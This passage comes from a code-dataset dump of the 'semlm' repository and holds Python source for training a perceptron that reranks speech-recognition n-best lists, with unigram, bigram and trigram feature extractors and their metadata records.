"text": "from Statistics.Zscore import Zscore\nfrom PopulationSamplingfunctions.Margin_error import MarginError\nfrom Statistics.Standarddeviation import Standarddeviation\n\n\nclass SampleSize:\n @staticmethod\n def unknown_pop_sample(data, percent):\n z_s = Zscore.zscore(data)\n m_e = MarginError.margin(data)\n p = percent\n q = 1 - p\n\n val = z_s / m_e\n samplePop = val**(0.5) * p * q\n\n return samplePop\n\n @staticmethod\n def known_pop_sample(data):\n z_s = Zscore.zscore(data)\n m_e = MarginError.margin(data)\n s_d = Standarddeviation.standarddeviation(data)\n\n value = (z_s * s_d) / m_e\n\n popSample = value**0.5\n\n return popSample\n"
},
{
"alpha_fraction": 0.7176656126976013,
"alphanum_fraction": 0.7182965278625488,
"avg_line_length": 30.386138916015625,
"blob_id": "446c26c5c89122f7640ba9eeafe6087ffe0124a8",
"content_id": "240017a0bdc231f4bbb4d52a75d58b826b9b10cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3170,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 101,
"path": "/Calculator/StatisticsCalculator.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import PopulationSamplingfunctions\nfrom Statistics.Mean import Mean\nfrom Statistics.Median import Median\nfrom Statistics.Mode import Mode\nfrom Statistics.Quartiles import Quartiles\nfrom Statistics.Skewness import Skewness\nfrom Statistics.Standarddeviation import Standarddeviation\nfrom Statistics.Variance import Variance\nfrom Statistics.PopulationCorrelation import PopulationCorrelation\nfrom Statistics.SampleCorrelation import Samplecorrelation\nfrom Statistics.Zscore import Zscore\nfrom Statistics.Meandeviation import Meandeviation\nfrom PopulationSamplingfunctions.Confidence_interval import ConfidenceInterval\nfrom PopulationSamplingfunctions.Crochran import Cochran\nfrom PopulationSamplingfunctions.Margin_error import MarginError\nfrom PopulationSamplingfunctions.Random_sampling import RandomSample\nfrom PopulationSamplingfunctions.Systematic_sampling import SystemicSample\nfrom PopulationSamplingfunctions.Sample_size import SampleSize\n\n\nclass StatsCalculator:\n Result = 0\n\n def __init__(self):\n pass\n\n def Mean(self, a):\n self.Result = Mean.mean(a)\n return self.Result\n\n def Median(self, a):\n self.Result = Median.median(a)\n return self.Result\n\n def Mode(self, a):\n self.Result = Mode.mode(a)\n return self.Result\n\n def Variance(self, a):\n self.Result = Variance.variance(a)\n return self.Result\n\n def Standarddeviation(self, a):\n self.Result = Standarddeviation.standarddeviation(a)\n return self.Result\n\n def Quartiles(self, a):\n self.Result = Quartiles.quartiles(a)\n return self.Result\n\n def Skewness(self, a):\n self.Result = Skewness.skewness(a)\n return self.Result\n\n def SampleCorrelation(self, a):\n self.Result = SampleCorrelation.samplecorrelation(a)\n return self.Result\n\n def PopulationCorrelation(self, a):\n self.Result = PopulationCorrelation.populationcorrelation(a)\n return self.Result\n\n def ZScore(self, a):\n self.Result = Zscore.zscore(a)\n return self.Result\n\n def MeanAbsoluteDeviation(self, a):\n self.Result = Meandeviation.meandeviation(a)\n return self.Result\n\n def SimpleRandomSampling(self, a, b, c):\n self.Result = RandomSample.simpleSample(b, a)\n return self.Result\n\n def SystemicSampling(self, a):\n self.Result = SystemicSample.systematicSample(a, 5)\n return self.Result\n\n def ConfidenceIntervalPopulation(self, a, b):\n self.Result = ConfidenceInterval.confidenceIntervalPopulation(b, a)\n return self.Result\n\n def ConfidenceIntervalSample(self, a, b):\n self.Result = ConfidenceInterval.confidenceIntervalSample(b, a)\n return self.Result\n\n def MarginError(self, a):\n self.Result = MarginError.margin(a)\n return self.Result\n\n def Cochran(self, a):\n self.Result = Cochran.cochran(a)\n return self.Result\n\n def SampleSizeUnknown(self, a, b):\n self.Result = SampleSize.unknown_pop_sample(a, b)\n return self.Result\n\n def SampleSizeKnown(self, a):\n self.Result = SampleSize.known_pop_sample(a)\n return self.Result\n"
},
{
"alpha_fraction": 0.6857143044471741,
"alphanum_fraction": 0.6857143044471741,
"avg_line_length": 16.66666603088379,
"blob_id": "ed142ef0b7ed94e1048b6217139b29e27890edca",
"content_id": "13c273829e8955595a13ffbc9867776632841069",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 105,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 6,
"path": "/Statistics/Mode.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import statistics\n\nclass Mode:\n @staticmethod\n def mode(data):\n return statistics.mode(data)"
},
{
"alpha_fraction": 0.6746002435684204,
"alphanum_fraction": 0.7288954854011536,
"avg_line_length": 33.92207717895508,
"blob_id": "6396013af4e1cfd1787aaf4538f4a6ff6da5f84e",
"content_id": "b0ec865e1e5a631025d24afb2e84ecdea636e561",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2689,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 77,
"path": "/Tests/test_Calculator.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom numpy.random import seed\nfrom numpy.random import randint\n\nfrom Statistics.Skewness import Skewness\nfrom Statistics.Median import Median\nfrom Statistics.Variance import Variance\nfrom Statistics.Standarddeviation import Standarddeviation\nfrom Statistics.Zscore import Zscore\nfrom Statistics.Meandeviation import Meandeviation\nfrom Statistics.Quartiles import Quartiles\nfrom Statistics.SampleCorrelation import Samplecorrelation\nfrom Statistics.PopulationCorrelation import PopulationCorrelation\nfrom Statistics.Statistics import Statistics\nfrom Statistics.Mode import Mode\nfrom Statistics.Mean import Mean\n\n\nclass MyTestCase(unittest.TestCase):\n def setUp(self) -> None:\n seed(5)\n self.testData = randint(10, 20, 30)\n self.testDataTwo = randint(10, 20, 30)\n self.statistics = Statistics()\n\n def test_instantiate_calculator(self):\n self.assertIsInstance(self.statistics, Statistics)\n\n def test_mean_calculator(self):\n mean = Mean.mean(self.testData)\n self.assertEqual(mean, 14.233333333333333)\n\n def test_median_calculator(self):\n median = Median.median(self.testData)\n self.assertEqual(median, 14.5 )\n\n def test_mode_calculator(self):\n mode = Mode.mode(self.testData)\n self.assertEqual(mode, 10)\n\n def test_variance_calculator(self):\n variance = Variance.variance(self.testData)\n self.assertEqual(variance, 11)\n\n def test_skewness_calculator(self):\n skew = Skewness.skewness(self.testData)\n self.assertEqual(skew, 0.03576490724804414)\n\n def test_standarddeviation_calculator(self):\n standard = Standarddeviation.standarddeviation(self.testData)\n self.assertEqual(standard, 3.3166247903554)\n\n def test_quartiles_calculator(self):\n quart = Quartiles.quartiles(self.testData)\n self.assertEqual(quart, (11.0, 14.5, 17.0))\n\n def test_zscore_calculator(self):\n zscore = Zscore.zscore(self.testData)\n self.assertEqual(zscore[0], -0.36778161169611)\n\n def test_meandeviation_calculator(self):\n meand = Meandeviation.meandeviation(self.testData)\n self.assertEqual(meand, 3.033333333333333)\n\n def test_samplecorrelation_calculator(self):\n newData = [self.testData, self.testDataTwo]\n samplec = Samplecorrelation.samplecorrelation(newData)\n self.assertEqual(samplec, 0.36163489596525095)\n\n def test_populationcorrelation_calculator(self):\n newData = [self.testData, self.testDataTwo]\n popc = PopulationCorrelation.populationcorrelation(newData)\n self.assertEqual(popc, 0.24767431950561303)\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.7388059496879578,
"alphanum_fraction": 0.7388059496879578,
"avg_line_length": 18.14285659790039,
"blob_id": "5f7e93a138c67d2ac3514b16814eba30964b69cf",
"content_id": "11a8b37fc469f28c0880171fbc24a6f15f11ad69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 134,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 7,
"path": "/Statistics/Standarddeviation.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import statistics\n\n\nclass Standarddeviation:\n @staticmethod\n def standarddeviation(data):\n return statistics.stdev(data)\n"
},
{
"alpha_fraction": 0.5469613075256348,
"alphanum_fraction": 0.5524861812591553,
"avg_line_length": 17.100000381469727,
"blob_id": "2bb08de8cd70630d1c7f0d8290cc3525cbc6feb9",
"content_id": "4039b5b4e2b95b96fb699adf98b78c91fd63135c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 181,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 10,
"path": "/Statistics/Mean.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import statistics\n\n\nclass Mean:\n @staticmethod\n def mean(array):\n total = 0\n for num in array:\n total = total + num\n return total / len(array)\n"
},
{
"alpha_fraction": 0.5725551843643188,
"alphanum_fraction": 0.578864336013794,
"avg_line_length": 22.518518447875977,
"blob_id": "dc3ab1ca77e9dc27220c79b2d386aa6d879ecf1c",
"content_id": "500a089cce90e5c8709250d5efda196d00951221",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 634,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 27,
"path": "/Random/Elements.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import random\n\n\nclass Elements:\n @staticmethod\n def randElem(arr):\n return arr[random.randrange(0, len(arr))]\n\n @staticmethod\n def prandElem(arr, seed):\n random.seed(seed)\n return arr[random.randrange(0, len(arr))]\n\n @staticmethod\n def randElems(arr, n):\n result = []\n for i in range(n):\n result.append(arr[random.randrange(0, len(arr))])\n return result\n\n @staticmethod\n def prandElems(arr, n, seed):\n random.seed(seed)\n result = []\n for i in range(n):\n result.append(arr[random.randrange(0, len(arr))])\n return result"
}
] | 24 |
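To show how the IS218Project pieces above fit together, here is a small usage sketch driving `StatsCalculator`; the sample data is invented and the calls only illustrate the call signatures, not actual output values:

from Calculator.StatisticsCalculator import StatsCalculator

calc = StatsCalculator()
data = [12, 15, 11, 19, 14, 14, 17]  # invented sample

print(calc.Mean(data))       # arithmetic mean
print(calc.Median(data))     # middle value
print(calc.Quartiles(data))  # (Q1, Q2, Q3) via numpy quantiles
# ConfidenceIntervalPopulation(a, b) forwards its arguments as (confidence=b, data=a):
print(calc.ConfidenceIntervalPopulation(data, 0.95))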
sspleo/DS_toolbox
|
https://github.com/sspleo/DS_toolbox
|
cf529862bf974ed2bdea20262e28cf242dbdbccb
|
7176611d2c481914bfb0fe4da37b53888642ae61
|
57160c09075c72f9106d3cdf12cf3ba407418dac
|
refs/heads/main
| 2023-02-28T12:29:08.267394 | 2021-02-04T05:01:20 | 2021-02-04T05:01:20 | 335,838,957 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5684864521026611,
"alphanum_fraction": 0.5962733030319214,
"avg_line_length": 34.569766998291016,
"blob_id": "3e8d43979ae64c95b315843c3bc4776771212a0b",
"content_id": "b18406460176ac4ff5cba34fb888909999bdc5cf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3059,
"license_type": "permissive",
"max_line_length": 170,
"num_lines": 86,
"path": "/heatmap_confusion_matrix.py",
"repo_name": "sspleo/DS_toolbox",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nfrom pandas import DataFrame as df\nfrom pandas_confusion import BinaryConfusionMatrix\nfrom seaborn import heatmap\n\ndef heatmap_confusion_matrix(actual_label, pred_label, output_folder, plot_title):\n \"\"\" Plot Confusion Matrix using Seaborn's Heatmap.\n \n This plot contains not just confusion matrix but also\n Accuracy, TPR(Recall, Sensitivity), Precision, TNR(specificity) and F1-Score\n Columns are predicted labels and Rows are actual labels\n \n Parameters\n ----------\n actual_label : 1D array\n actual labels of the data\n pred_label : 1D array\n predicted labels\n output_folder : path\n path to output folder where output plot will be saved\n plot_title : string\n plot title which may conclude data information and model description\n \n Returns\n -------\n result : Confusion matrix plot with test result statistics\n Saved plot file to output_folder\n \"\"\"\n # Create confusion matrix\n binary_confusion_matrix = BinaryConfusionMatrix(actual_label, pred_label)\n \n # Result statistics from the confusion matrix\n stats = binary_confusion_matrix.stats()\n pos_real = stats['P']\n neg_real = stats['N']\n pos_pred = stats['PositiveTest']\n neg_pred = stats['NegativeTest']\n TP = stats['TP']\n TN = stats['TN']\n FP = stats['FP']\n FN = stats['FN']\n TPR = round(stats['TPR'], 2) #sensitivity, recall: TP/(TP+FN) = TP/pos_real\n TNR = round(stats['TNR'], 2) #specificity\n PPV = round(stats['PPV'], 2) #precision : TP/(TP+FP) = TP/pos_pred\n F1_score = round(stats['F1_score'], 2) #harmonic mean of recall and precision\n ACC = round(stats['ACC'], 2)\n \n # Confusion matrix for display\n cm = np.array([[TN,FP], [FN,TP]])\n \"\"\"\n TN FP\n FN TP\n \"\"\"\n df_cm = df(cm, index = ['{} \\nDecoy'.format(neg_real), '%d \\nActive'%(pos_real)], columns = ['Decoy\\n%d'%(neg_pred), 'Active\\n%d'%(pos_pred)])\n plot = plt.figure(figsize = (6, 6))\n plt.rcParams['font.size'] = 10\n plt.title(\"Accuracy : {:.2f} TPR : {:.2f}\\nPrecision : {:.2f} TNR : {:.2f} F1-Score : {:.2f}\".format(ACC, TPR, PPV, TNR, F1_score), loc = 'left', fontsize = 12)\n plt.suptitle(plot_title, y = 0.95, fontsize= 14)\n plt.xlabel('Predicted Label')\n plt.ylabel('Actual Label')\n plt.subplots_adjust(top = 0.8)\n \n # plot heatmap\n heatmap(df_cm, annot = True, fmt = 'd', annot_kws={\"size\":14})\n \n # save plot and display it\n plot.savefig('{}/test_result_confusion_matrix.png'.format(output_folder))\n plt.show()\n plt.close()\n\n\n\"\"\"\nExamples\n--------\n>>>> import numpy as np\n>>>> import os\n>>>> reals = np.array([1,1,1,1,1,1,1,1,1,1, #10\n 0,0,0,0,0,0,0,0,0, #9\n 0,0, #2\n 1,1,1]) #3\n>>>> predicts = np.array([1,1,1,1,1,1,1,1,1,1,\n 0,0,0,0,0,0,0,0,0,\n 1,1,\n 0,0,0])\n>>>> heatmap_confusion_matrix(reals, predicts, os.getcwd(), 'Heatmap Confusion Matrix Sample')\n\"\"\"\n"
},
{
"alpha_fraction": 0.8029196858406067,
"alphanum_fraction": 0.8029196858406067,
"avg_line_length": 67.5,
"blob_id": "eec1758835eec34bc6844071e037b582cfcf8b9f",
"content_id": "d5a935a246cb9589966f347201d23a9fb03c31f9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 137,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 2,
"path": "/README.md",
"repo_name": "sspleo/DS_toolbox",
"src_encoding": "UTF-8",
"text": "# DS_toolbox\nA clump of nothing which takes space on your device, but possibly would be helpful for somebody interested in Data Science.\n"
}
] | 2 |
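As a cross-check for the statistics the heatmap above reports, here is a rough equivalent using `sklearn.metrics` instead of the older `pandas_confusion` package; the label arrays simply repeat the toy example from the record's own docstring, and the sklearn substitution is my assumption, not part of the repository:

import numpy as np
from sklearn.metrics import confusion_matrix, accuracy_score, precision_score, recall_score, f1_score

reals    = np.array([1]*10 + [0]*9 + [0]*2 + [1]*3)   # same toy labels as the docstring example
predicts = np.array([1]*10 + [0]*9 + [1]*2 + [0]*3)

tn, fp, fn, tp = confusion_matrix(reals, predicts).ravel()  # rows = actual, columns = predicted
print('ACC', accuracy_score(reals, predicts))
print('TPR', recall_score(reals, predicts))      # sensitivity / recall
print('PPV', precision_score(reals, predicts))   # precision
print('TNR', tn / (tn + fp))                     # specificity
print('F1 ', f1_score(reals, predicts))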
Maksymdelta/semlm
|
https://github.com/Maksymdelta/semlm
|
d45d076449372fd93c10d99b31de0fb0398f1a45
|
b3fdc1bdb3942d0dc202bdc37d783bb19c518368
|
af6a729571f46a06364c4ff1dd78498761da088a
|
refs/heads/master
| 2021-01-11T10:27:23.945364 | 2017-01-09T03:19:06 | 2017-01-09T03:19:06 | 79,100,625 | 1 | 0 | null | 2017-01-16T09:02:40 | 2016-07-11T05:34:27 | 2017-01-09T03:19:08 | null |
[
{
"alpha_fraction": 0.6337562203407288,
"alphanum_fraction": 0.6373414397239685,
"avg_line_length": 37.553192138671875,
"blob_id": "fc5b3d9641ed27eb350a5b7924b63e50527dd6ae",
"content_id": "dcde1a75dba621f414760b7ec40cc80d42c8f638",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7252,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 188,
"path": "/bin/new-perceptron.py",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\n\"\"\"\nGiven some nbest lists and a reference...\n\n - Split the nbests into a train and test set.\n - Create PRO train and test sets.\n - Vectorize everything into numeric features.\n - Train an sk-learn model, and print pairwise accuracy.\n - Create a WSLM.\n\"\"\"\n\n# Let's factor stuff out of this file to clean it up.\n\nimport argparse\nimport colorama\nimport logging\nimport pickle\nimport cProfile, pstats, io\n\nimport numpy as np\n\nfrom timeit import default_timer as timer\n\nfrom sklearn.feature_extraction import DictVectorizer\n\nfrom asr_tools.kaldi import read_nbest_file\nfrom asr_tools.evaluation_util import set_global_references\nfrom asr_tools.nbest_util import evaluate_nbests, evaluate_nbests_oracle\nfrom asr_tools.reranking import rerank_nbests\nfrom asr_tools.util import Timer\n\nfrom semlm.feature_extractor import UnigramFE, BigramFE, CompoundFE, TrigramFE\nfrom semlm.model import WSLM\n\n# These are doing the hard work...\nfrom semlm.pro import nbest_pairs, nbest_pairs_random, nbest_hyp_best_pairs\nfrom semlm.perceptron import perceptron\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('nbest_file')\n parser.add_argument('ref_file', type=argparse.FileType('r'))\n # What does this mean? It's the data?\n pickle_group = parser.add_mutually_exclusive_group()\n pickle_group.add_argument('--load-pickle', action='store_true', default=False)\n pickle_group.add_argument('--save-pickle', action='store_true', default=False)\n parser.add_argument('-n', '--nbest_sample_size', type=int, default=100)\n parser.add_argument('-e', '--epochs', type=int, default=5)\n parser.add_argument('-r', '--learning-rate', type=float, default=0.01)\n parser.add_argument('-s', '--selection-mode', choices=['all', 'random', 'hyp_best'])\n parser.add_argument('-f', '--print-features', action='store_true', default=False)\n return parser.parse_args()\n\ndef print_data_info(vec, train_data, test_data):\n print('Vocab sample: {}'.format(vec.feature_names_[:10]))\n print('Params object: {}'.format(vec.get_params()))\n print('Feature representation: {}'.format(type(train_data).__name__))\n print('Feature representation: {}'.format(type(test_data).__name__))\n print('Train feature array dim: {dim[0]} x {dim[1]}'.format(dim=train_data.shape))\n print('Test feature array dim: {dim[0]} x {dim[1]}'.format(dim=test_data.shape))\n\ndef feature_extract_sents(sentences):\n \"\"\"Run feature extraction on the given set of sentences.\"\"\"\n fe = UnigramFE()\n feat_dict_list = []\n for sent in sentences:\n feats = fe.extract(sent)\n sent.features = feats\n feat_dict_list.add(feats)\n vec = DictVectorizer()\n vec.fit(feat_dict_list)\n for sent in sentences:\n sent.fv = vec.transform(sent.features)\n\ndef print_evaluation(train_nbests, test_nbests):\n print('TRAIN: ' + str(evaluate_nbests(train_nbests)))\n print('TEST: ' + str(evaluate_nbests(test_nbests)))\n \ndef main():\n args = parse_args()\n colorama.init()\n set_global_references(args.ref_file)\n\n if args.load_pickle:\n with Timer('Reading n-bests from pickle'):\n with open(args.nbest_file, 'rb') as f:\n nbests = pickle.load(f)\n else:\n with open(args.nbest_file, 'r') as f:\n with Timer('Reading n-bests from text'):\n nbests = list(read_nbest_file(f))\n with Timer('Evaluating n-bests'):\n evaluate_nbests(nbests)\n if args.save_pickle:\n with open(args.nbest_file + '.pickle', 'wb') as f:\n with Timer('Saving data as pickle'):\n pickle.dump(nbests, f)\n\n for nbest in nbests:\n nbest.crop(20)\n \n 
train_nbests = nbests[0:len(nbests) // 2]\n test_nbests = nbests[len(nbests) // 2:] \n \n # Do feature extraction. Need a better abstraction for feature extraction I think.\n # Should be able to do something like extract_features(s1)\n fe = CompoundFE([UnigramFE(), BigramFE(), TrigramFE()])\n feature_dict = {}\n feature_start = timer()\n with Timer('Extracting features'):\n for nbest in train_nbests:\n for sentence in nbest.sentences:\n feature_dict.update(fe.extract(sentence))\n fe.fix(feature_dict)\n # Now that we have a feature vectorizer, we can extract feature IDs. This gives the sentence its IDs.\n with Timer('Vectorizing features'):\n for nbest in nbests:\n for sentence in nbest.sentences:\n feature_ids = fe.extract_ids(sentence)\n sentence.feature_vector = feature_ids\n\n # Need an initial set of weights and initial model\n with Timer('Initializing model'):\n params = np.zeros((1, fe.size()))\n model = WSLM(fe.vec, fe, params)\n\n # print()\n # print('Training/test/total nbests: {}/{}/{}'.format(len(train_nbests),\n # len(test_nbests),\n # len(nbests)))\n # print_evaluation(train_nbests, test_nbests)\n # print('Training oracle:')\n # print(evaluate_nbests_oracle(train_nbests))\n # print('Test oracle:')\n # print(evaluate_nbests_oracle(test_nbests))\n\n # Do an initial scoring and re-ranking\n func = lambda x: model.score(x)\n # The re-ranking ops appear that they are destructive\n rerank_nbests(train_nbests, func)\n rerank_nbests(test_nbests, func) \n print('INITIAL EVAL:')\n print_evaluation(train_nbests, test_nbests)\n\n print('=======')\n print('Beginning training...')\n train_start = timer()\n for e in range(args.epochs):\n print('Epoch: {}'.format(e+1))\n # Creates an iterator of pairs...\n # Some of these will have to be reranked for the next iteration to do anything\n if args.selection_mode == 'all':\n pair_iter = nbest_pairs(train_nbests)\n elif args.selection_mode == 'random':\n pair_iter = nbest_pairs_random(train_nbests, args.nbest_sample_size)\n elif args.selection_mode == 'hyp_best':\n pair_iter = nbest_hyp_best_pairs(train_nbests)\n else:\n raise Exception('Unknown selection method: {}'.format(args.selection_mode))\n perceptron(pair_iter, model, rate=args.learning_rate)\n print('Re-ranking n-best lists...')\n func = lambda x: model.score(x) # Spending most of our time in here. have to call it n*log(n) times to score each n-best\n # The re-ranking ops appear that they are destructive\n rerank_nbests(train_nbests, func)\n rerank_nbests(test_nbests, func)\n print_evaluation(train_nbests, test_nbests)\n print('=======')\n\n train_end = timer()\n print('Training: {:.3f} seconds'.format(train_end - train_start))\n\n # Do a final scoring and re-ranking\n func = lambda x: model.score(x)\n # The re-ranking ops appear that they are destructive\n rerank_nbests(train_nbests, func)\n rerank_nbests(test_nbests, func)\n\n print('=======')\n print('FINAL EVAL:')\n print_evaluation(train_nbests, test_nbests)\n \n if args.print_features:\n model.print_feature_weights(max=100)\n\n \nif __name__ == \"__main__\":\n main()\n\n\n\n\n"
},
{
"alpha_fraction": 0.6236044764518738,
"alphanum_fraction": 0.6236044764518738,
"avg_line_length": 33.83333206176758,
"blob_id": "af6395a1539e6c9b50cf184c49f0d387b1aa6c91",
"content_id": "0b58cc7166b9dd78cedf5bb2b6d423cf27855d9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 627,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 18,
"path": "/semlm/example.py",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
"text": "\"\"\"\nRepresents an 'example' a very generic object with a class and features,\nfor level machine learning purposes.\n\"\"\"\n\nclass Example(object):\n \"\"\"Represents an 'example' a very generic object with a class and features,\n for level machine learning purposes.\"\"\"\n\n def __init__(self, class_, features):\n \"\"\"Must initialize with a class and features.\"\"\"\n self.class_ = class_\n self.features = features\n\n def __unicode__(self):\n \"\"\"Print the class and features readably.\"\"\"\n str_ = ['<', 'class:', str(self.class_), 'features:' + str(self.features), '>']\n return ' '.join(str_)\n"
},
{
"alpha_fraction": 0.5932896733283997,
"alphanum_fraction": 0.621931254863739,
"avg_line_length": 32.94444274902344,
"blob_id": "1eb9217ac2f6c873624e61d69b1f380edef78845",
"content_id": "ace86679dd1710a555025247f7849896d49328c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1222,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 36,
"path": "/semlm/perceptron.py",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSimple `numpy`-based implementation of Perceptron.\n\"\"\"\n\nfrom numpy.linalg import norm\n\ndef perceptron(pairs, model, print_progress=False, rate=0.01):\n \"\"\"Train the given model on the given pairs of sentences.\"\"\"\n counter = 0\n for pair in pairs:\n counter += 1\n perceptron_update(pair, model, rate=rate)\n if print_progress and counter % 10000 == 0:\n print('{} pairs...'.format(counter))\n print('Model - norm: {}'.format(norm(model.params)))\n\ndef perceptron_update(pair, model, rate=0.01):\n \"\"\"Perform the perceptron update on the given model using the\n given pair of sentences.\"\"\"\n s1, s2 = pair\n score1 = model.score(s1)\n score2 = model.score(s2)\n wer1 = s1.wer()\n wer2 = s2.wer()\n score_diff = score1 - score2\n wer_diff = wer1 - wer2\n # same decision?\n if score_diff * wer_diff >= 0:\n # do nothing, they had the same classification\n pass\n else:\n # they had different classifications, so update the model.\n s1_vector = s1.feature_vector * wer_diff * rate\n s2_vector = s2.feature_vector * wer_diff * rate\n new_params = model.params + s1_vector - s2_vector\n model.params = new_params\n"
},
{
"alpha_fraction": 0.5675932765007019,
"alphanum_fraction": 0.5702067017555237,
"avg_line_length": 28.43356704711914,
"blob_id": "5aac1d94a89f9ff1d9a6605f958c5be96d92e85b",
"content_id": "a6d3d8f85fb7edc23821a8d6309db90b6f88bd6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4209,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 143,
"path": "/semlm/feature_extractor.py",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFEs return maps. This is in part for compatibilty with sklearn.\n\"\"\"\n\nfrom itertools import tee\nfrom collections import defaultdict\nfrom sklearn.feature_extraction import DictVectorizer\n\n\n# Should this keep it's own list of features somwhere?\n\n# Should this have its own \"fit\" function? Takes an iterator\n# over sentences as input?\n\nclass FE(object):\n \"\"\"Generic feature extractor.\"\"\"\n\n # Feature vectorizer--maps from features to ints\n def __init__(self):\n \"\"\"Set the vectorizer to None.\"\"\"\n self.vec = None\n\n def extract(self, s):\n \"\"\"An abstract method for extracting features (non-integer).\"\"\"\n raise NotImplementedError()\n\n def size(self):\n \"\"\"The size of the featurizer's vocabulary (i.e. how many features\n this FE could produce).\"\"\"\n return len(self.vec.vocabulary_)\n\n def extract_ids(self, s):\n \"\"\"Given a sentence object return a sequence of feature IDs for that\n sentence.\"\"\"\n if not self.vec:\n raise Exception(\"Can't extract feature IDs without a vectorizer.\")\n return self.vec.transform(self.extract(s))\n\n def fix(self, features):\n \"\"\"`features` can be a mapping or an iterable over mappings?\"\"\"\n vec = DictVectorizer()\n vec.fit([features])\n self.vec = vec\n\nclass CompoundFE(FE):\n \"\"\"A compound feature extractor, contains multiple feature extractors and\n returns the set of features produced by all of them.\"\"\"\n\n def __init__(self, fes):\n \"\"\"Initialize with a sequence of feature extractors.\"\"\"\n super(CompoundFE, self).__init__()\n self.fes = fes\n\n # How much does something like this help/hurt performance?\n # def extract(self, s):\n # return itertools.chain.from_iterable(map(lambda x: x.extract(s), self.fes))\n def extract(self, s):\n \"\"\"Extract (non-int) features from sentence `s`.\"\"\"\n features = {}\n for fe in self.fes:\n features.update(fe.extract(s))\n return features\n\nclass UnigramFE(FE):\n \"\"\"Unigram feature extractor. 
Values can be either binary (is the word\n present or not) or counts (how many times does the feature occur).\"\"\"\n\n def __init__(self, binary=False):\n super(UnigramFE, self).__init__()\n self.binary = binary\n\n def extract(self, s):\n \"\"\"Returns a map.\"\"\"\n features = defaultdict(int)\n for word in s.words:\n if self.binary:\n features[word] = 1\n else:\n features[word] += 1\n return features\n\n\nclass BigramFE(FE):\n \"\"\"Bigram feature extractor.\"\"\"\n\n def __init__(self, binary=False):\n super(BigramFE, self).__init__()\n self.binary = binary\n\n def extract(self, s):\n \"\"\"Returns a map.\"\"\"\n features = defaultdict(int)\n a, b = tee(s.words)\n next(b, None)\n for x, y in zip(a, b):\n feat = ' '.join([x, y])\n if self.binary:\n features[feat] = 1\n else:\n features[feat] += 1\n return features\n\nclass TrigramFE(FE):\n \"\"\"Trigram feature extractor.\"\"\"\n\n def __init__(self, binary=False):\n super(TrigramFE, self).__init__()\n self.binary = binary\n\n def extract(self, s):\n \"\"\"Returns a map.\"\"\"\n features = defaultdict(int)\n a, b, c = tee(s.words, 3)\n next(b, None)\n next(c, None)\n next(c, None)\n for x, y, z in zip(a, b, c):\n feat = ' '.join([x, y, z])\n if self.binary:\n features[feat] = 1\n else:\n features[feat] += 1\n return features\n\n# class NgramFE(FE):\n# I'm not sure if a completely general implementation is possible...?\n# def extract(self, s):\n# \"\"\"Returns a map.\"\"\"\n# features = defaultdict(int)\n# n = 3\n# iterators = tee(s.words, n)\n# print(iterators)\n# for i in range(2, n):\n# for j in range(i):\n# next(iterators[i], None)\n# print(iterators)\n# for ngram in zip(iterators):\n# print(ngram)\n# if self.binary:\n# features[ngram] = 1\n# else:\n# features[ngram] += 1\n# return features\n"
},
{
"alpha_fraction": 0.6656976938247681,
"alphanum_fraction": 0.7180232405662537,
"avg_line_length": 30.272727966308594,
"blob_id": "84d5ddbc50daf525f319e13d876424a9464c3e0f",
"content_id": "50a4b71801228dec88d86837ffefc62d6713e1f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 344,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 11,
"path": "/.pylintrc",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
